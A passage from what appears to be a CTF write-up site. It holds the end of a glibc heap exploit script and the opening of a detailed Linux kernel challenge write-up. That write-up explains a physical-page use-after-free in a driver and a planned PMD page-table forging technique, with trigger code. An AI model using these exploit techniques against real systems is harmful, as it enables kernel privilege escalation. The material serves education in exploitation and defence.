uu64(content[0x10:0x18]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(1, 0x20, b\u0026#34;A\u0026#34; * 0x10 + p64(win) + p64(win_hash)) cashout(15) # parity bump for payout payout() sl(b\u0026#34;ls\u0026#34;) sl(b\u0026#34;cat ./flag.txt\u0026#34;) p.interactive() Flag # UMDCTF{smallbins_still_love_the_stack_when_the_house_sets_the_table} ","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/umd-26/velvet-table/","section":"CTFs","summary":"Glibc 2.32+ heap note manager wrapped in heavy XOR obfuscation. An inverted size check in the cashout handler turns the dev’s careful tcache bookkeeping into a free UAF, with a slightly longer smallbin attack waiting behind it as the intended path.","title":"Velvet Table","type":"ctfs"},{"content":"","date":"12 March 2026","externalUrl":null,"permalink":"/writeups/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/0xfunctf-26/","section":"CTFs","summary":"","title":"0xfun CTF 2026","type":"ctfs"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/huge-pages/","section":"Tags","summary":"","title":"Huge-Pages","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/kernel/","section":"Tags","summary":"","title":"Kernel","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/mmap/","section":"Tags","summary":"","title":"Mmap","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/modprobe-path/","section":"Tags","summary":"","title":"Modprobe-Path","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/page-tables/","section":"Tags","summary":"","title":"Page-Tables","type":"tags"},{"content":" The page is freed, but its ghost lingers.\nThe challenge provides a vulnerable kernel module (phantom.ko) running inside a QEMU virtual machine. We get a busybox shell as uid 1000 and need to read /flag, which is root-only. All the standard kernel mitigations are enabled.\nqemu-system-x86_64 -m 256M -kernel ./bzImage -initrd ./initramfs.cpio.gz \\ -append \u0026#34;console=ttyS0 oops=panic panic=1 quiet kaslr\u0026#34; \\ -cpu qemu64,+smep,+smap -monitor /dev/null -nographic -no-reboot Let\u0026rsquo;s break down the QEMU flags:\nFlag Effect -m 256M 256MB physical RAM. Small enough that the page allocator\u0026rsquo;s free lists are shallow, which is critical for our page reclamation strategy. -kernel ./bzImage Boots kernel 6.6.15 directly (no bootloader). -append \u0026quot;... kaslr\u0026quot; Enables KASLR. The kernel\u0026rsquo;s virtual and physical base addresses are randomized at boot. -cpu qemu64,+smep,+smap Enables SMEP and SMAP (explained below). -no-reboot Kernel panic = instant VM death. No second chances, no crash-and-retry loops. oops=panic panic=1 Any kernel oops escalates to a panic. Even a non-fatal error (null deref with recovery) kills the VM. Kernel mitigations # KASLR (Kernel Address Space Layout Randomization) randomizes the kernel\u0026rsquo;s virtual and physical base addresses at each boot. This means hardcoded addresses from a local build won\u0026rsquo;t work on the remote—we need to discover addresses dynamically.\nSMEP (Supervisor Mode Execution Prevention) is a CPU feature (controlled via CR4 bit 20) that prevents code running in ring 0 (kernel mode) from executing instructions on pages whose U/S (User/Supervisor) page table bit is set. In other words: the kernel cannot jump to and execute userspace memory. Without SMEP, a classic kernel exploit technique called ret2user works: overwrite a kernel function pointer to point at a userspace buffer containing shellcode, and the kernel happily executes it. SMEP kills this by making the CPU throw a page fault if ring 0 tries to execute a page marked as User. On x86-64 with SMEP, the kernel can only execute code from pages marked Supervisor (i.e., the kernel\u0026rsquo;s own .text section).\nSMAP (Supervisor Mode Access Prevention) is a related CPU feature (CR4 bit 21) that extends the restriction to data accesses: ring 0 cannot read from or write to User-marked pages. Without SMAP, even if you can\u0026rsquo;t execute userspace code (thanks to SMEP), you can still trick the kernel into reading attacker-controlled data from userspace—for example, by placing a fake struct in userspace and having the kernel dereference a pointer to it. SMAP closes this gap: any kernel attempt to mov from a User page triggers a fault. The kernel must explicitly toggle SMAP off (via the STAC/CLAC instructions) around legitimate copy_from_user()/copy_to_user() calls.\nTogether, SMEP and SMAP force exploits to work entirely within kernel memory: you can\u0026rsquo;t redirect execution to userspace (SMEP), and you can\u0026rsquo;t feed the kernel fake data from userspace (SMAP). This is why our exploit takes a different approach: rather than corrupting the kernel from inside, we forge our own page table entries to access kernel physical memory from userspace. SMEP/SMAP restrict what the kernel can do with userspace pages. They say nothing about what userspace can do if it manages to create a mapping to kernel physical memory.\nWe\u0026rsquo;re also given interface.h, which defines two ioctl commands:\n#define CMD_ALLOC 0x133701 #define CMD_FREE 0x133702 ioctl (input/output control) is a syscall for sending device-specific commands to a file descriptor — a catch-all for operations that don\u0026rsquo;t fit into read/write/seek:\nint ioctl(int fd, unsigned long request, ...); fd — an open file descriptor (here, /dev/phantom) request — a command number defined by the driver ... — an optional argument (pointer or integer, depends on the command) When userspace calls ioctl(fd, CMD_ALLOC, 0), the kernel looks up the unlocked_ioctl function pointer in the file\u0026rsquo;s file_operations struct and calls it with the command number. The driver inspects the command and does whatever it wants — there\u0026rsquo;s no enforced structure. Each driver defines its own protocol.\nThe standard convention is to encode metadata into the command number using macros from \u0026lt;linux/ioctl.h\u0026gt;:\n// Standard convention (this driver doesn\u0026#39;t use it): #define MY_CMD_READ _IOR(\u0026#39;M\u0026#39;, 1, struct my_data) // read from device #define MY_CMD_WRITE _IOW(\u0026#39;M\u0026#39;, 2, struct my_data) // write to device // Encodes: direction (R/W), type (\u0026#39;M\u0026#39;), command number (1/2), argument size This driver doesn\u0026rsquo;t follow that convention. 0x133701 and 0x133702 are raw magic numbers with no encoded metadata. This is technically valid — the kernel doesn\u0026rsquo;t enforce the encoding — but it makes the driver slightly harder to discover via strace or ioctl scanners, since tools that decode standard ioctl numbers will just show the raw hex.\nReversing the module # Relocatable objects and why this matters # Kernel modules (.ko files) are not regular executables. A normal binary (like /usr/bin/ls) has all its addresses resolved by the linker — function calls jump to concrete addresses. A .ko file is a relocatable ELF object: it\u0026rsquo;s compiled but not yet linked to its final address. When the kernel loads the module with insmod, it places the module\u0026rsquo;s code and data at an arbitrary kernel address and then patches all the internal references to use the real addresses. These patches are described by relocation entries in the ELF file.\nThis matters for reversing because if a tool doesn\u0026rsquo;t process the relocation entries, function pointers in structs appear as zeroes — a struct that should say \u0026ldquo;ioctl handler is at function X\u0026rdquo; just shows 0x0000000000000000. Ghidra has historically struggled with .ko files for this reason, though recent versions have improved.\nIDA Pro and Binary Ninja handle .ko relocations well — they apply them automatically. When you load phantom.ko in IDA, it resolves the relocations for you: call instructions show the target symbol name (call __free_pages), and struct fields display as proper cross-references rather than zeros. For quick analysis, objdump -d -r also works: -d disassembles the code and -r shows relocation entries inline, so you can see which symbol each call targets without a full disassembler setup.\nThe module is tiny: six functions total, four of which are the driver callbacks.\nThe miscdevice and file_operations structs # init_module and cleanup_module are trivial wrappers:\n__int64 init_module(void) { return misc_register(\u0026amp;phantom_miscdev); // .data+0x5C0 } __int64 cleanup_module(void) { return misc_deregister(\u0026amp;phantom_miscdev); } misc_register() registers a simple character device. It takes a pointer to a miscdevice struct, which tells the kernel three things: what minor number to use, what to name the device file under /dev/, and which functions to call when userspace opens/reads/writes/ioctls the device.\nThe kernel\u0026rsquo;s miscdevice struct definition looks like this:\n// include/linux/miscdevice.h struct miscdevice { int minor; // offset 0x00 (padded to 8 bytes) const char *name; // offset 0x08 const struct file_operations *fops; // offset 0x10 // ... more fields we don\u0026#39;t care about }; To figure out what our module passes to misc_register, we follow the cross-reference from init_module to .data+0x5C0. IDA shows the struct clearly with relocations already resolved:\n.data:0x5C0 db 0FFh ; minor = 0xFF .data:0x5C1 db 7 dup(0) ; (padding) .data:0x5C8 dq offset aPhantom ; → \u0026#34;phantom\u0026#34; .data:0x5D0 dq offset off_2A0 ; → file_operations in .rodata The first 8 bytes are the minor field. Linux identifies device files using two numbers: a major number (which driver handles this device) and a minor number (which specific device within that driver). For example, /dev/sda and /dev/sdb share the same major number (8, the SCSI disk driver) but have different minor numbers (0 and 16). You can see these with ls -l /dev/. All misc devices share major number 10, and the minor number distinguishes them from each other. 0xFF (255) means MISC_DYNAMIC_MINOR — \u0026ldquo;I don\u0026rsquo;t care which minor number, just pick any available one.\u0026rdquo; The next two qwords are pointers that IDA has resolved from the ELF relocation entries: aPhantom is the \u0026quot;phantom\u0026quot; string, and off_2A0 points to the file_operations struct in .rodata.\nSo in C, this is equivalent to:\nstruct miscdevice phantom_miscdev = { .minor = MISC_DYNAMIC_MINOR, // 255 → kernel picks a minor number .name = \u0026#34;phantom\u0026#34;, // creates /dev/phantom .fops = \u0026amp;phantom_fops, // → file_operations struct in .rodata }; When the module loads, the kernel calls misc_register(\u0026amp;phantom_miscdev), which creates /dev/phantom. Any time userspace opens, reads, writes, or ioctls that device file, the kernel dispatches to the function pointers in phantom_fops.\nReading the file_operations struct # Now we need to figure out what\u0026rsquo;s in the file_operations struct at .rodata+0x2A0. This struct is how Linux drivers register their callback functions. It has dozens of fields — one for each possible file operation — and the kernel definition looks like (abbreviated):\n// include/linux/fs.h (simplified, showing only relevant fields with offsets) struct file_operations { struct module *owner; // offset 0x00 loff_t (*llseek)(...); // offset 0x08 ssize_t (*read)(...); // offset 0x10 ssize_t (*write)(...); // offset 0x18 // ... 5 more function pointers ... long (*unlocked_ioctl)(...); // offset 0x48 // ... 1 more ... int (*mmap)(...); // offset 0x58 // ... 1 more ... int (*open)(...); // offset 0x68 // ... 1 more ... int (*release)(...); // offset 0x78 // ... many more fields, all NULL in our module ... }; Each field is a function pointer (8 bytes on x86-64). Most drivers only implement a handful of operations and leave the rest as NULL (zero). Following IDA\u0026rsquo;s cross-reference from off_2A0, we can see which slots in the struct have function pointers and which are zero. The non-NULL entries at their offsets within the struct:\nOffset file_operations field Target function +0x00 owner __this_module +0x48 unlocked_ioctl phantom_ioctl (.text+0x110) +0x58 mmap phantom_mmap (.text+0x90) +0x68 open phantom_open (.text+0x10) +0x78 release phantom_release (.text+0x30) We match these offsets against the kernel\u0026rsquo;s file_operations definition to identify the field names. Everything between these entries is zeros (NULL). The module only implements four callbacks out of the dozens available:\nCallback Code address What it does open .text+0x10 Called when userspace does open(\u0026quot;/dev/phantom\u0026quot;, ...) release .text+0x30 Called when the last fd to the file is closed unlocked_ioctl .text+0x110 Called when userspace does ioctl(fd, cmd, arg) mmap .text+0x90 Called when userspace does mmap(..., fd, ...) Operations like read, write, poll, llseek, etc. are all NULL, meaning the kernel returns -EINVAL or uses a default handler if userspace tries them.\nOne more thing before we look at the functions. When reversing the four callbacks, you\u0026rsquo;ll notice they all read and write the same address: 0xAC0. This is a global variable — a single pointer that lives for the entire lifetime of the module, shared across all calls. It starts as NULL (zero) and gets set when CMD_ALLOC creates the driver\u0026rsquo;s state struct. I\u0026rsquo;ll call it g_ctx (global context). It points to a small struct that tracks the allocated page, its virtual address, and whether it\u0026rsquo;s been freed. We\u0026rsquo;ll see the struct layout once we look at ioctl.\nphantom_open (.text+0x10) # __int64 phantom_open(struct inode *inode, struct file *filp) { return 0; } A stub. Returns success unconditionally. No per-file state is created here—that\u0026rsquo;s deferred to CMD_ALLOC. This means you can open /dev/phantom multiple times, but only one allocation can exist at a time (enforced by the global g_ctx pointer).\nNote that g_ctx is a global (.bss), not a per-file pointer stored in filp-\u0026gt;private_data. This is a design choice (or laziness) that means the driver is effectively single-user: if two processes open /dev/phantom simultaneously, they share the same state. For exploitation this doesn\u0026rsquo;t matter since we\u0026rsquo;re the only user.\nphantom_release (.text+0x30) # __int64 phantom_release(struct inode *inode, struct file *filp) { struct phantom_ctx *ctx = g_ctx; if (g_ctx) { if (!g_ctx-\u0026gt;freed \u0026amp;\u0026amp; g_ctx-\u0026gt;page) { __free_pages(g_ctx-\u0026gt;page, 0); // order 0 = single page } kfree(ctx); g_ctx = NULL; } return 0; } Two kernel functions to understand here:\nkfree(ptr) frees a small heap object that was allocated with kmalloc. This is the kernel\u0026rsquo;s equivalent of userspace free(). It returns the memory to the kernel\u0026rsquo;s slab allocator, which manages small fixed-size allocations (32 bytes, 64 bytes, 128 bytes, etc.) carved out of full 4KB pages. Our 24-byte phantom_ctx struct lives in the kmalloc-32 slab, and kfree returns it there.\n__free_pages(page, order) frees a physical page (or a contiguous block of \\(2^{\\text{order}}\\) pages) back to the kernel\u0026rsquo;s buddy allocator. This is a lower-level allocator than the slab — it manages entire 4KB pages of physical memory. order = 0 means a single page. The page argument is a struct page *, the kernel\u0026rsquo;s metadata descriptor for a physical page frame, not a virtual address.\nThese are two different allocators: the slab allocator (kmalloc/kfree) hands out small objects by carving up pages internally, and the buddy allocator (alloc_pages/__free_pages) hands out whole pages directly. Our driver uses both: kmalloc for the 24-byte state struct, alloc_pages for the 4KB data page.\nThe logic has two paths on close. Recall from interface.h that the driver has two ioctl commands: CMD_ALLOC (allocate a page) and CMD_FREE (free the page). These are the commands that userspace sends via ioctl(fd, CMD_ALLOC, 0) and ioctl(fd, CMD_FREE, 0). When CMD_FREE is called, it frees the physical page and sets ctx-\u0026gt;freed = 1 as a flag. The release function checks this flag to decide what to clean up:\nfreed == 1 (userspace already called CMD_FREE): just kfree(ctx) to return the 24-byte struct to the slab, and NULL out g_ctx. The page was already returned to the buddy allocator by CMD_FREE. freed == 0 (userspace never called CMD_FREE): call __free_pages(ctx-\u0026gt;page, 0) to return the page to the buddy allocator, then kfree(ctx) to free the struct. This is correct cleanup for normal usage. The bug isn\u0026rsquo;t here — it\u0026rsquo;s in the interaction between mmap and CMD_FREE, which we\u0026rsquo;ll see in the ioctl handler.\nFrom the struct accesses across all four functions, we can reconstruct the state struct layout:\nstruct phantom_ctx { struct page *page; // offset 0x00: kernel page descriptor pointer unsigned long virt; // offset 0x08: kernel virtual address of the page int freed; // offset 0x10: flag: was CMD_FREE called? int _pad; // offset 0x14: padding to 0x18 (24 bytes) }; The kmalloc call in ioctl requests exactly \\(\\texttt{0x18} = 24\\) bytes, confirming the struct is 24 bytes.\nphantom_ioctl (.text+0x110) # This is the heart of the driver. The full IDA decompilation with types applied. A note on the return values: kernel functions return negative errno values on failure. The ones you\u0026rsquo;ll see here:\nConstant Value Meaning -EINVAL -22 Invalid argument (bad command, wrong state) -EEXIST -17 Already exists (page already allocated) -ENOMEM -12 Out of memory (allocation failed) -EFAULT -14 Bad address (used in mmap if remap_pfn_range fails) These are defined in \u0026lt;asm-generic/errno-base.h\u0026gt;. When a syscall returns one of these, the C library translates it: ioctl() returns -1 and sets errno to the positive value (e.g. errno = ENOMEM), which perror() then prints as \u0026ldquo;Cannot allocate memory.\u0026rdquo;\n__int64 phantom_ioctl(struct file *filp, unsigned int cmd) { if (cmd == CMD_ALLOC) { if (g_ctx) return -EEXIST; // kmalloc: allocate 24 bytes of kernel heap memory (zeroed) // This is the kernel equivalent of calloc(1, 24) g_ctx = kmalloc(24, GFP_KERNEL | __GFP_ZERO); if (!g_ctx) return -ENOMEM; // alloc_pages: allocate one physical 4KB page from the buddy allocator // Returns a struct page* (the kernel\u0026#39;s metadata for a physical page frame), // not a usable pointer — we need to convert it to a virtual address below g_ctx-\u0026gt;page = alloc_pages(GFP_KERNEL, 0); // order 0 = single page if (!g_ctx-\u0026gt;page) { kfree(g_ctx); // free the struct we just allocated g_ctx = NULL; return -ENOMEM; } // Convert struct page* → kernel virtual address (explained below) g_ctx-\u0026gt;freed = 0; unsigned long virt = page_to_virt(g_ctx-\u0026gt;page); g_ctx-\u0026gt;virt = virt; // Fill entire 4KB page with 0x41 (\u0026#39;A\u0026#39;) bytes memset(virt, 0x41, 4096); return 0; } else if (cmd == CMD_FREE) { if (!g_ctx || g_ctx-\u0026gt;freed) return -EINVAL; // Return the physical page to the buddy allocator __free_pages(g_ctx-\u0026gt;page, 0); // order 0 = single page g_ctx-\u0026gt;freed = 1; return 0; } else { return -EINVAL; } } The decompilation above is cleaned up for readability. In the actual binary, kmalloc appears as kmalloc_trace(kmalloc_caches[5], ...) (an internal variant that takes a slab cache pointer directly), and page_to_virt is inlined as a sequence of arithmetic on vmemmap_base and page_offset_base. The logic is the same.\nLet\u0026rsquo;s look at the key operations in detail.\nCMD_ALLOC — slab allocation and GFP flags:\nThe kmalloc_trace call uses GFP_KERNEL | __GFP_ZERO (\\(\\texttt{0xDC0}\\)). Breaking down the flags:\n$$\\underbrace{\\texttt{GFP_KERNEL}}{\\texttt{0xCC0}} \\mathbin{|} \\underbrace{\\texttt{__GFP_ZERO}}{\\texttt{0x100}} = \\texttt{0xDC0}$$\nGFP_KERNEL is the standard allocation flag for kernel code that can sleep—it allows the allocator to reclaim pages, perform I/O, and call into the filesystem if memory is tight. __GFP_ZERO zeroes the memory after allocation, equivalent to kzalloc().\nThe kmalloc_caches[5] index selects the slab cache. In the kernel\u0026rsquo;s kmalloc cache table, index 5 corresponds to kmalloc-32 (the 32-byte cache). So the 24-byte struct gets a 32-byte slab object, with 8 bytes of padding.\nCMD_ALLOC — page allocation:\nThe alloc_pages(0xCC0, 0) call is alloc_pages(GFP_KERNEL, 0) — no __GFP_ZERO this time (the driver fills with 0x41 instead). Order 0 means \\(2^0 = 1\\) page (4KB). alloc_pages() returns a struct page * pointer, the kernel\u0026rsquo;s metadata descriptor for the physical page.\nCMD_ALLOC — why page_to_virt exists:\nalloc_pages() returns a struct page * — but that\u0026rsquo;s not a pointer you can read from or write to. It\u0026rsquo;s a pointer to the kernel\u0026rsquo;s metadata about a physical page (reference count, flags, LRU list pointers, etc.), not the page\u0026rsquo;s actual contents. To actually use the page — fill it with data, copy to it, zero it — the kernel needs a virtual address that maps to that physical memory.\nWhy this indirection? Because the kernel needs to track information about pages separately from the page contents themselves. A physical page might be used for userspace memory, page cache, a network buffer, or a page table — the kernel needs metadata for all of them, but the page contents are different in each case. The struct page array is the kernel\u0026rsquo;s bookkeeping; the actual data lives in physical memory accessed through virtual addresses.\nThe conversion from struct page * to a usable virtual address is page_to_virt(). The kernel keeps two key base addresses for this:\nvmemmap_base (typically 0xffffea0000000000): the start of the struct page descriptor array. Physical page 0\u0026rsquo;s descriptor is at \\(\\texttt{vmemmap_base} + 0\\), page 1\u0026rsquo;s at \\(\\texttt{vmemmap_base} + 64\\), etc. (each descriptor is 64 bytes). page_offset_base (typically 0xffff888000000000): the start of the kernel\u0026rsquo;s direct map — a linear mapping of all physical memory into kernel virtual address space. Physical address 0x1000 is accessible at page_offset_base + 0x1000. The conversion is just arithmetic — figure out which page number this descriptor belongs to, then look up that page in the direct map:\n$$\\text{page_number} = \\frac{\\texttt{page} - \\texttt{vmemmap_base}}{64}$$ $$\\text{virt} = \\texttt{page_offset_base} + \\text{page_number} \\times 4096$$\nIn the binary this appears as bit shifts (\\(\\gg 6\\) to divide by 64, \\(\\ll 12\\) to multiply by 4096) rather than multiply/divide, but it\u0026rsquo;s the same math.\nCMD_ALLOC — the 0x41 fill:\nThe memset(virt, 0x41, 4096) fills every byte of the page with 0x41 ('A'). This serves two purposes: it confirms the page is accessible, and it gives us a recognizable sentinel value (0x4141414141414141 when read as a qword) that we can later check to determine whether the page has been reclaimed by someone else.\nCMD_FREE:\nCMD_FREE calls __free_pages to return the page to the buddy allocator, then sets ctx-\u0026gt;freed = 1 — but does not clear ctx-\u0026gt;page. The stale struct page * pointer remains in the struct. The freed flag prevents a double-free via another CMD_FREE, and prevents mmap from creating new mappings. But any existing mapping created before the free persists.\nphantom_mmap (.text+0x90) # __int64 phantom_mmap(struct file *filp, struct vm_area_struct *vma) { if (!g_ctx) return -EINVAL; // -22 if (g_ctx-\u0026gt;freed) return -EINVAL; if (!g_ctx-\u0026gt;page) return -EINVAL; unsigned long start = vma-\u0026gt;vm_start; unsigned long size = vma-\u0026gt;vm_end - start; if (size \u0026gt; 0x1000) return -EINVAL; // max one page unsigned long pfn = (g_ctx-\u0026gt;page - vmemmap_base) \u0026gt;\u0026gt; 6; int ret = remap_pfn_range(vma, start, pfn, size, vma-\u0026gt;vm_page_prot); if (ret) return -EFAULT; // -14 return 0; } remap_pfn_range() is a kernel function that creates a direct mapping from a userspace virtual address to a specific physical frame number (PFN). Its legitimate use case is mapping memory that isn\u0026rsquo;t managed by the page allocator — things like:\nHardware MMIO registers: a GPU driver maps the GPU\u0026rsquo;s control registers into userspace so a graphics library can talk to the hardware directly without syscall overhead. DMA buffers: a network or video capture driver allocates a buffer for hardware DMA and maps it into userspace for zero-copy I/O. Firmware regions: mapping BIOS/UEFI tables or other fixed physical memory. The key thing these all have in common: the physical memory being mapped doesn\u0026rsquo;t come from alloc_pages(). It\u0026rsquo;s hardware addresses or reserved memory that the page allocator doesn\u0026rsquo;t know about. That\u0026rsquo;s why remap_pfn_range disables reference counting — when userspace unmaps MMIO memory, the kernel shouldn\u0026rsquo;t try to \u0026ldquo;free\u0026rdquo; the GPU\u0026rsquo;s hardware registers back to the page allocator. They\u0026rsquo;re not the kernel\u0026rsquo;s to free.\nThis driver uses remap_pfn_range on a page that does come from alloc_pages(). That\u0026rsquo;s the wrong tool for the job. The correct approach for mapping allocator-managed pages to userspace is vm_insert_page() or simply using a fault handler in vm_operations_struct, both of which properly maintain reference counts. Using remap_pfn_range on an allocator page is a well-known antipattern in kernel driver development, and it\u0026rsquo;s what creates the vulnerability here.\nThe size check allows at most PAGE_SIZE (\\(\\texttt{0x1000} = 4096\\)) — you can\u0026rsquo;t map more than one page through a single mmap call. But one page is all we need.\nThe vulnerability # There\u0026rsquo;s a subtle but critical ordering issue. The mmap handler checks ctx-\u0026gt;freed and refuses to create new mappings after CMD_FREE. But nothing prevents this sequence:\nCMD_ALLOC — allocate a page, freed = 0 mmap() — create a userspace mapping (succeeds because freed == 0) CMD_FREE — free the physical page, set freed = 1 The key thing to understand is that remap_pfn_range and __free_pages are completely independent operations that don\u0026rsquo;t know about each other:\nremap_pfn_range just writes a PTE into the process\u0026rsquo;s page tables: \u0026ldquo;virtual address X maps to physical frame Y.\u0026rdquo; It doesn\u0026rsquo;t lock the page, hold a reference, or register itself anywhere. It\u0026rsquo;s a one-shot write to a page table entry. __free_pages just returns a page to the buddy allocator. It checks the page\u0026rsquo;s reference count, decrements it, and if it hits zero, puts the page on the free list. It doesn\u0026rsquo;t scan every process\u0026rsquo;s page tables to check if someone still has a PTE pointing to this frame. Normally these two operations are kept safe by reference counting: when the kernel creates a mapping to a page (through the normal vm_insert_page path, not remap_pfn_range), it increments the page\u0026rsquo;s refcount. So even if the driver calls __free_pages, the refcount is still \\(\u0026gt; 0\\) and the page isn\u0026rsquo;t actually freed until the mapping is also removed.\nBut remap_pfn_range skips the refcount — it was designed for hardware memory that will never be freed, so why bother counting? The consequence is that nothing connects the mapping to the page. The driver can call __free_pages and the page is genuinely freed, while the PTE still sits there in the page tables pointing to the now-free physical frame. The hardware MMU doesn\u0026rsquo;t know or care — it sees a valid PTE and dutifully translates accesses. We have a dangling mapping to freed physical memory.\nint fd = open(\u0026#34;/dev/phantom\u0026#34;, O_RDWR); ioctl(fd, CMD_ALLOC, 0); volatile uint64_t *uaf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); ioctl(fd, CMD_FREE, 0); // uaf[0..511] reads/writes a freed physical page // The page is filled with 0x4141414141414141 from CMD_ALLOC // Once the kernel reuses this page, we see (and can modify) whatever it put there This is a physical page UAF, not a slab UAF. The distinction matters: slab UAFs give you access to a freed slab object (typically 32-2048 bytes inside a slab page), while this gives us access to an entire 4KB physical page. The page can be reused for anything: slab pages, page tables, pipe buffers, file page cache, anonymous memory, etc. We choose what it gets reused for by controlling the allocation pattern after the free.\nBackground: virtual memory and page tables # If you\u0026rsquo;re already comfortable with x86-64 paging, the MMU hardware walk, and huge pages, skip ahead to the exploit strategy.\nWhy paging exists # Every process has its own virtual address space. When your program reads address 0x40000000, the CPU doesn\u0026rsquo;t go to physical RAM byte 0x40000000. Instead, the CPU\u0026rsquo;s MMU (Memory Management Unit) translates that virtual address to a physical address using page tables, data structures in physical memory that define the mapping. Different processes have different page tables, so the same virtual address in two processes can point to completely different physical memory. The kernel manages these tables, and the hardware walks them on every memory access.\nThe four-level page table walk # On x86-64, a 48-bit virtual address is split into five fields:\n63 48 47 39 38 30 29 21 20 12 11 0 ┌──────────┬─────────┬─────────┬─────────┬─────────┬──────────┐ │ sign ext │ PGD │ PUD │ PMD │ PTE │ offset │ │ (16 bit) │ (9 bit) │ (9 bit) │ (9 bit) │ (9 bit) │ (12 bit) │ └──────────┴─────────┴─────────┴─────────┴─────────┴──────────┘ Each 9-bit field selects one of 512 entries (since \\(2^9 = 512\\)) in that level\u0026rsquo;s table. Each table is exactly one 4KB page (\\(512 \\times 8 = 4096\\) bytes). The hardware walks the tree:\nCR3 register holds the physical address of the PGD (Page Global Directory, also called PML4) PGD[bits 47:39] gives the physical address of a PUD (Page Upper Directory) page PUD[bits 38:30] gives the physical address of a PMD (Page Middle Directory) page PMD[bits 29:21] gives the physical address of a PTE (Page Table Entry) page PTE[bits 20:12] gives the physical address of the final 4KB data page bits 11:0 are the byte offset within that 4KB page flowchart LR CR3[\"CR3\"] --\u003e PGD[\"PGD\n512 entries\"] PGD --\u003e|\"bits 47:39\"| PUD[\"PUD\n512 entries\"] PUD --\u003e|\"bits 38:30\"| PMD[\"PMD\n512 entries\"] PMD --\u003e|\"bits 29:21\"| PTE[\"PTE\n512 entries\"] PTE --\u003e|\"bits 20:12\"| PAGE[\"4KB\ndata page\"] style CR3 fill:#2d333b,stroke:#444 style PGD fill:#1c3049,stroke:#388bfd style PUD fill:#1c3049,stroke:#388bfd style PMD fill:#5a3a1e,stroke:#d29922 style PTE fill:#1a6334,stroke:#2ea043 style PAGE fill:#6e3630,stroke:#f85149 That diagram shows how a virtual address is sliced up to index into each table level. Now let\u0026rsquo;s look at what\u0026rsquo;s inside each table. Each entry is 8 bytes and contains a physical address (of the next-level table or the final page) plus permission and status flags in the low bits. The key flags are:\nBit Name Meaning 0 P (Present) Entry is valid. If clear, accessing this address triggers a page fault. 1 R/W If set, the page is writable. If clear, writes trigger a fault. 2 U/S If set, userspace can access this page. If clear, only kernel mode can. 5 A (Accessed) Set by hardware when the page is read. 6 D (Dirty) Set by hardware when the page is written. 7 PS (Page Size) At the PMD level: if set, this is a 2MB \u0026ldquo;huge page\u0026rdquo; (no PTE level). The physical address is stored in bits 51:12 (for normal 4KB pages) or bits 51:21 (for 2MB huge pages), with the low bits used for flags. Since pages are always aligned to their size (\\(2^{12}\\) for 4KB, \\(2^{21}\\) for 2MB), those low bits are architecturally zero in the address and available for flags.\n2MB huge pages (PMD level) # Normally, each PMD entry points to a PTE page, and each PTE entry points to a final 4KB data page. A single PMD entry governs \\(512 \\times \\text{4KB} = \\text{2MB}\\) of virtual address space. But when the PS bit (bit 7) is set in a PMD entry, the CPU short-circuits: it skips the PTE level entirely and treats the PMD entry as a direct mapping of a 2MB region of physical memory. This is why huge pages are exactly 2MB — it\u0026rsquo;s the same amount of address space that one PMD entry normally covers through 512 individual 4KB pages, just mapped as one contiguous block instead.\nflowchart LR subgraph \"Normal (4KB pages)\" PMD1[\"PMD entry\n(covers 2MB)\"] --\u003e PTE1[\"PTE page\n512 entries × 8B = 4KB\"] --\u003e P1[\"512 × 4KB pages\n= 2MB total\"] end subgraph \"Huge page (2MB)\" PMD2[\"PMD entry\n(PS=1)\"] --\u003e P2[\"2MB contiguous\nphysical memory\"] end style PMD1 fill:#5a3a1e,stroke:#d29922 style PTE1 fill:#1a6334,stroke:#2ea043 style P1 fill:#6e3630,stroke:#f85149 style PMD2 fill:#5a3a1e,stroke:#d29922 style P2 fill:#6e3630,stroke:#f85149 The entry format for a 2MB huge page:\nbits 51:21 = physical base address (2MB-aligned, low 21 bits implicit zero) bit 7 = PS = 1 (Page Size, marks this as a huge page) bit 6 = D (Dirty) bit 5 = A (Accessed) bit 2 = U/S (User/Supervisor) bit 1 = R/W (Read/Write) bit 0 = P (Present) So a PMD entry value of physical_address | 0xE7 means: present (bit 0), read-write (bit 1), user-accessible (bit 2), accessed (bit 5), dirty (bit 6), huge page (bit 7). That\u0026rsquo;s \\(\\texttt{0b11100111} = \\texttt{0xE7}\\). This single 8-byte value gives userspace full read-write access to 2MB of contiguous physical memory.\nTLB caching and invalidation # The page table walk is expensive: four sequential memory reads just to translate one virtual address. To avoid doing this on every memory access, the CPU caches recent translations in the TLB (Translation Lookaside Buffer). When we modify page table entries, stale TLB entries can cause the CPU to use the old translation.\nThe TLB must be explicitly invalidated. On x86-64, writing to the CR3 register flushes the entire TLB (on CPUs without PCID (Process Context Identifiers), which includes our qemu64). The kernel rewrites CR3 on every context switch (returning from syscalls included), so a simple syscall like getpid() acts as a full TLB flush:\nstatic inline void tlb_flush(void) { getpid(); } After modifying a PMD entry via our UAF and calling getpid(), the next memory access through the corresponding virtual address will walk the page tables fresh and see our modified entry.\nHow page table pages get allocated # When the kernel needs to create a new page table entry (for example, when you mmap a new region and then touch it for the first time), it needs physical pages to hold the table itself. These page table pages come from the same page allocator that serves alloc_page(). The kernel calls functions like pte_alloc_one and pmd_alloc which internally call alloc_page(GFP_KERNEL) (or a similar variant) to get a fresh page.\nThis is the key insight for the exploit: our freed page goes back to the same pool that the kernel draws from when it needs new page table pages. If we can trigger the right allocation pattern, we can get the kernel to reuse our freed page as a PMD page. Then our UAF pointer directly reads and writes PMD entries, and we can craft arbitrary huge page mappings.\nExploit strategy # Now that we understand the moving parts, here\u0026rsquo;s the plan:\nUAF: Allocate a page, mmap it, free it. We get R/W access to a freed physical page. PMD reclaim: Spray page table allocations so the freed page gets reclaimed as a PMD page. PMD identification: Figure out which virtual address range our PMD governs. Forge 